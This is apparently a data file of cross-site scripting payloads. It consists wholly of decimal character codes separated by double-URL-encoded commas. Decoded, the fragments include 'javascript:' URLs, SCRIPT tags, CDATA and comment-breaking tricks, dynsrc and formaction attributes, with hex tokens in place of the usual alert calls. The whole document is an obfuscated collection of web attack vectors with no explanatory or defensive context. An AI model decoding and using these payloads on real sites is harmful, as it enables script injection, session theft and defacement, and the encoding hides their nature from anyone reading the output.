8,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,54,37,50,53,50,67,51,50,37,50,53,50,67,49,49,54,37,50,53,50,67,49,50,49,37,50,53,50,67,49,49,50,37,50,53,50,67,49,48,49,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,57,37,50,53,50,67,57,55,37,50,53,50,67,49,48,51,37,50,53,50,67,49,48,49,37,50,53,50,67,51,52,37,50,53,50,67,51,50,37,50,53,50,67,49,48,48,37,50,53,50,67,49,50,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,52,37,50,53,50,67,57,57,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,53,55,37,50,53,50,67,53,52,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,49,48,49,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,53,49,37,50,53,50,67,53,50,37,50,53,50,67,53,50,37,50,53,50,67,53,48,37,50,53,50,67,49,48,49,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,53,53,37,50,53,50,67,49,48,50,37,50,53,50,67,57,56,37,50,53,50,67,53,54,37,50,53,50,67,53,48,37,50,53,50,67,53,52,37,50,53,50,67,49,48,50,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,53,48,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50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1,56,37,50,53,50,67,53,48,37,50,53,50,67,53,51,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,53,51,37,50,53,50,67,53,49,37,50,53,50,67,52,56,37,50,53,50,67,52,56,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,53,55,37,50,53,50,67,57,55,37,50,53,50,67,53,48,37,50,53,50,67,53,48,37,50,53,50,67,57,57,37,50,53,50,67,53,48,37,50,53,50,67,57,56,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,53,55,37,50,53,50,67,52,57,37,50,53,50,67,57,57,37,50,53,50,67,57,56,37,50,53,50,67,53,50,37,50,53,50,67,52,57,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,53,52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1,56,37,50,53,50,67,49,50,51,37,50,53,50,67,57,56,37,50,53,50,67,53,51,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,53,49,37,50,53,50,67,53,48,37,50,53,50,67,53,49,37,50,53,50,67,53,55,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,53,50,37,50,53,50,67,49,48,49,37,50,53,50,67,53,53,37,50,53,50,67,53,48,37,50,53,50,67,53,52,37,50,53,50,67,53,49,37,50,53,50,67,53,50,37,50,53,50,67,53,50,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,53,50,37,50,53,50,67,53,50,37,50,53,50,67,57,56,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,53,53,37,50,53,50,67,53,52,37,50,53,50,67,53,49,37,50,53,50,67,49,50,53,37,50,53,50,67,53,57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1,37,50,53,50,67,55,55,37,50,53,50,67,55,49,37,50,53,50,67,51,50,37,50,53,50,67,56,51,37,50,53,50,67,56,50,37,50,53,50,67,54,55,37,50,53,50,67,54,49,37,50,53,50,67,51,56,37,50,53,50,67,49,50,51,37,50,53,50,67,57,56,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,57,55,37,50,53,50,67,53,53,37,50,53,50,67,53,50,37,50,53,50,67,49,48,50,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,53,52,37,50,53,50,67,53,48,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,51,37,50,53,50,67,53,54,37,50,53,50,67,53,48,37,50,53,50,67,53,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,53,50,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,53,53,37,50,53,50,67,49,48,50,37,50,53,50,67,53,53,37,50,53,50,67,57,56,37,50,53,50,67,57,56,37,50,53,50,67,49,50,53,37,50,53,50,67,53,57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7,55,37,50,53,50,67,51,50,37,50,53,50,67,49,48,52,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,57,55,37,50,53,50,67,57,56,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,54,37,50,53,50,67,53,56,37,50,53,50,67,53,51,37,50,53,50,67,53,55,37,50,53,50,67,53,50,37,50,53,50,67,53,53,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,49,37,50,53,50,67,53,50,37,50,53,50,67,53,53,37,50,53,50,67,57,55,37,50,53,50,67,57,56,37,50,53,50,67,53,54,37,50,53,50,67,53,52,37,50,53,50,67,57,55,37,50,53,50,67,53,48,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,53,50,37,50,53,50,67,53,50,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,52,57,37,50,53,50,67,53,55,37,50,53,50,67,52,57,37,50,53,50,67,53,53,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,53,50,37,50,53,50,67,53,53,37,50,53,50,67,53,52,37,50,53,50,67,52,56,37,50,53,50,67,53,55,37,50,53,50,67,53,54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49,48,53,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,51,37,50,53,50,67,53,56,37,50,53,50,67,51,50,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,56,37,50,53,50,67,52,48,37,50,53,50,67,49,48,54,37,50,53,50,67,57,55,37,50,53,50,67,49,49,56,37,50,53,50,67,57,55,37,50,53,50,67,49,49,53,37,50,53,50,67,57,57,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,54,37,50,53,50,67,53,56,37,50,53,50,67,53,53,37,50,53,50,67,57,56,37,50,53,50,67,53,50,37,50,53,50,67,49,48,50,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,52,57,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,57,57,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,53,50,37,50,53,50,67,53,54,37,50,53,50,67,53,51,37,50,53,50,67,57,56,37,50,53,50,67,57,56,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,57,57,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55,37,50,53,50,67,53,53,37,50,53,50,67,52,57,37,50,53,50,67,53,55,37,50,53,50,67,53,55,37,50,53,50,67,52,56,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,52,49,37,50,53,50,67,53,57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5,57,37,50,53,50,67,54,54,37,50,53,50,67,55,52,37,50,53,50,67,54,57,37,50,53,50,67,54,55,37,50,53,50,67,56,52,37,50,53,50,67,51,50,37,50,53,50,67,57,57,37,50,53,50,67,49,48,56,37,50,53,50,67,57,55,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,53,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,57,57,37,50,53,50,67,49,48,56,37,50,53,50,67,49,49,53,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,48,37,50,53,50,67,53,56,37,50,53,50,67,52,54,37,50,53,50,67,52,54,37,50,53,50,67,52,54,37,50,53,50,67,51,52,37,50,53,50,67,51,50,37,50,53,50,67,57,57,37,50,53,50,67,49,49,49,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,49,49,53,37,50,53,50,67,49,48,49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49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,57,57,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,53,37,50,53,50,67,53,55,37,50,53,50,67,57,55,37,50,53,50,67,53,48,37,50,53,50,67,57,56,37,50,53,50,67,52,57,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,49,48,49,37,50,53,50,67,52,57,37,50,53,50,67,57,56,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,53,48,37,50,53,50,67,49,48,48,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,49,48,49,37,50,53,50,67,57,56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9,53,37,50,53,50,67,49,49,54,37,50,53,50,67,49,50,49,37,50,53,50,67,49,48,56,37,50,53,50,67,49,48,49,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,51,51,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,54,37,50,53,50,67,49,50,49,37,50,53,50,67,49,48,56,37,50,53,50,67,49,48,49,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,56,51,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56,52,37,50,53,50,67,54,50,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,53,52,37,50,53,50,67,53,53,37,50,53,50,67,53,51,37,50,53,50,67,53,49,37,50,53,50,67,53,48,37,50,53,50,67,49,48,49,37,50,53,50,67,53,53,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,53,55,37,50,53,50,67,53,53,37,50,53,50,67,53,53,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,57,56,37,50,53,50,67,57,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,51,37,50,53,50,67,53,51,37,50,53,50,67,53,55,37,50,53,50,67,53,48,37,50,53,50,67,53,52,37,50,53,50,67,52,57,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,53,55,37,50,53,50,67,53,48,37,50,53,50,67,53,51,37,50,53,50,67,53,48,37,50,53,50,67,52,55,37,50,53,50,67,52,55,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,56,51,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48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1,51,37,50,53,50,67,57,49,37,50,53,50,67,54,55,37,50,53,50,67,54,56,37,50,53,50,67,54,53,37,50,53,50,67,56,52,37,50,53,50,67,54,53,37,50,53,50,67,57,49,37,50,53,50,67,54,48,37,50,53,50,67,51,51,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,57,51,37,50,53,50,67,57,51,37,50,53,50,67,54,48,37,50,53,50,67,56,51,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56,52,37,50,53,50,67,54,50,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,52,57,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,53,50,37,50,53,50,67,53,54,37,50,53,50,67,53,53,37,50,53,50,67,53,52,37,50,53,50,67,57,56,37,50,53,50,67,53,52,37,50,53,50,67,49,48,48,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,57,56,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,53,51,37,50,53,50,67,53,49,37,50,53,50,67,49,48,50,37,50,53,50,67,53,53,37,50,53,50,67,53,53,37,50,53,50,67,52,55,37,50,53,50,67,52,55,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,56,51,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56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1,51,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,51,50,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,51,50,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,54,50,37,50,53,50,67,57,57,37,50,53,50,67,57,55,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,52,57,37,50,53,50,67,52,56,37,50,53,50,67,49,48,49,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,49,48,50,37,50,53,50,67,53,54,37,50,53,50,67,52,57,37,50,53,50,67,57,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,53,37,50,53,50,67,53,50,37,50,53,50,67,49,48,48,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,53,54,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,53,53,37,50,53,50,67,53,51,37,50,53,50,67,52,57,37,50,53,50,67,53,54,37,50,53,50,67,57,55,37,50,53,50,67,53,55,37,50,53,50,67,52,56,37,50,53,50,67,49,48,50,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,54,48,37,50,53,50,67,51,51,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,51,50,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,51,50,37,50,53,50,67,52,53,37,50,53,50,67,52,53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50,48,37,50,53,50,67,49,48,57,37,50,53,50,67,49,48,56,37,50,53,50,67,51,50,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,56,56,37,50,53,50,67,51,52,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,57,55,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,57,56,37,50,53,50,67,54,50,37,50,53,50,67,53,55,37,50,53,50,67,52,57,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,53,48,37,50,53,50,67,53,51,37,50,53,50,67,49,48,48,37,50,53,50,67,53,48,37,50,53,50,67,53,55,37,50,53,50,67,53,52,37,50,53,50,67,53,51,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,53,52,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,53,49,37,50,53,50,67,49,48,50,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,53,51,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,48,37,50,53,50,67,57,57,37,50,53,50,67,53,57,37,50,53,50,67,54,48,37,50,53,50,67,57,56,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,57,55,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,49,50,48,37,50,53,50,67,49,48,57,37,50,53,50,67,49,48,56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48,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,56,37,50,53,50,67,51,50,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,49,49,54,37,50,53,50,67,57,55,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,56,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,57,56,37,50,53,50,67,51,52,37,50,53,50,67,51,50,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,49,49,54,37,50,53,50,67,57,55,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,57,37,50,53,50,67,57,55,37,50,53,50,67,49,49,54,37,50,53,50,67,57,55,37,50,53,50,67,49,49,53,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,48,52,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,57,37,50,53,50,67,49,48,56,37,50,53,50,67,51,52,37,50,53,50,67,51,50,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,49,49,54,37,50,53,50,67,57,55,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,52,37,50,53,50,67,57,57,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,51,53,37,50,53,50,67,53,53,37,50,53,50,67,52,57,37,50,53,50,67,53,51,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,50,37,50,53,50,67,53,55,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,50,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,53,51,37,50,53,50,67,53,48,37,50,53,50,67,57,56,37,50,53,50,67,53,50,37,50,53,50,67,53,48,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,48,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,52,57,37,50,53,50,67,53,54,37,50,53,50,67,53,51,37,50,53,50,67,53,49,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,53,52,37,50,53,50,67,51,52,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,56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6,56,37,50,53,50,67,55,55,37,50,53,50,67,55,54,37,50,53,50,67,51,50,37,50,53,50,67,55,51,37,50,53,50,67,54,56,37,50,53,50,67,54,49,37,50,53,50,67,55,51,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,56,56,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,54,55,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,51,51,37,50,53,50,67,57,49,37,50,53,50,67,54,55,37,50,53,50,67,54,56,37,50,53,50,67,54,53,37,50,53,50,67,56,52,37,50,53,50,67,54,53,37,50,53,50,67,57,49,37,50,53,50,67,54,48,37,50,53,50,67,55,51,37,50,53,50,67,55,55,37,50,53,50,67,55,49,37,50,53,50,67,51,50,37,50,53,50,67,56,51,37,50,53,50,67,56,50,37,50,53,50,67,54,55,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,48,54,37,50,53,50,67,57,55,37,50,53,50,67,49,49,56,37,50,53,50,67,57,55,37,50,53,50,67,49,49,53,37,50,53,50,67,57,51,37,50,53,50,67,57,51,37,50,53,50,67,54,48,37,50,53,50,67,51,51,37,50,53,50,67,57,49,37,50,53,50,67,54,55,37,50,53,50,67,54,56,37,50,53,50,67,54,53,37,50,53,50,67,56,52,37,50,53,50,67,54,53,37,50,53,50,67,57,49,37,50,53,50,67,57,57,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,54,37,50,53,50,67,53,56,37,50,53,50,67,57,55,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,57,57,37,50,53,50,67,49,48,49,37,50,53,50,67,53,51,37,50,53,50,67,53,51,37,50,53,50,67,53,50,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,57,57,37,50,53,50,67,53,49,37,50,53,50,67,53,50,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,49,48,50,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,53,53,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,57,56,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,52,56,37,50,53,50,67,49,48,50,37,50,53,50,67,53,54,37,50,53,50,67,51,52,37,50,53,50,67,54,50,37,50,53,50,67,57,51,37,50,53,50,67,57,51,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,54,55,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,56,56,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,49,50,48,37,50,53,50,67,49,48,57,37,50,53,50,67,49,48,56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0,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,57,37,50,53,50,67,51,50,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,54,37,50,53,50,67,51,52,37,50,53,50,67,51,50,37,50,53,50,67,52,55,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,57,56,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,54,37,50,53,50,67,49,49,54,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,51,50,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,57,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,54,37,50,53,50,67,51,52,37,50,53,50,67,51,50,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,57,37,50,53,50,67,57,55,37,50,53,50,67,57,57,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48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2,57,37,50,53,50,67,53,53,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48,37,50,53,50,67,52,57,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,52,56,37,50,53,50,67,53,52,37,50,53,50,67,49,48,50,37,50,53,50,67,53,49,37,50,53,50,67,49,48,50,37,50,53,50,67,53,49,37,50,53,50,67,53,52,37,50,53,50,67,52,56,37,50,53,50,67,57,55,37,50,53,50,67,52,57,37,50,53,50,67,57,57,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,49,48,49,37,50,53,50,67,53,50,37,50,53,50,67,53,55,37,50,53,50,67,53,49,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,53,51,37,50,53,50,67,53,55,37,50,53,50,67,53,55,37,50,53,50,67,53,48,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,51,52,37,50,53,50,67,54,50,37,50,53,50,67,56,56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9,48,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,54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7,56,37,50,53,50,67,53,52,37,50,53,50,67,53,48,37,50,53,50,67,53,49,37,50,53,50,67,53,55,37,50,53,50,67,57,55,37,50,53,50,67,49,48,50,37,50,53,50,67,53,50,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,53,51,37,50,53,50,67,49,48,49,37,50,53,50,67,53,51,37,50,53,50,67,53,51,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,53,52,37,50,53,50,67,49,48,48,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,53,54,37,50,53,50,67,53,52,37,50,53,50,67,57,57,37,50,53,50,67,49,48,49,37,50,53,50,67,57,56,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,53,49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9,53,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,56,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,49,49,54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1,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,53,53,37,50,53,50,67,49,48,48,37,50,53,50,67,52,57,37,50,53,50,67,53,53,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,53,53,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,53,50,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,53,50,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49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9,54,37,50,53,50,67,49,48,49,37,50,53,50,67,49,50,48,37,50,53,50,67,49,49,54,37,50,53,50,67,57,55,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55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4,37,50,53,50,67,49,48,49,37,50,53,50,67,53,53,37,50,53,50,67,57,55,37,50,53,50,67,53,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,51,37,50,53,50,67,53,48,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,57,55,37,50,53,50,67,53,48,37,50,53,50,67,52,56,37,50,53,50,67,53,55,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,53,52,37,50,53,50,67,53,49,37,50,53,50,67,49,48,49,37,50,53,50,67,52,57,37,50,53,50,67,57,56,37,50,53,50,67,53,54,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,57,56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5,37,50,53,50,67,49,48,49,37,50,53,50,67,49,50,49,37,50,53,50,67,49,48,51,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,48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5,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,48,37,50,53,50,67,53,55,37,50,53,50,67,49,48,48,37,50,53,50,67,57,56,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,49,48,50,37,50,53,50,67,53,50,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,57,56,37,50,53,50,67,52,57,37,50,53,50,67,49,48,48,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,57,55,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,53,49,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,53,48,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,52,56,37,50,53,50,67,49,48,50,37,50,53,50,67,53,55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8,53,37,50,53,50,67,49,49,48,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,54,37,50,53,50,67,51,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,57,56,37,50,53,50,67,49,48,56,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,52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1,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,53,55,37,50,53,50,67,53,53,37,50,53,50,67,57,56,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,57,55,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,53,51,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,53,53,37,50,53,50,67,57,55,37,50,53,50,67,53,55,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,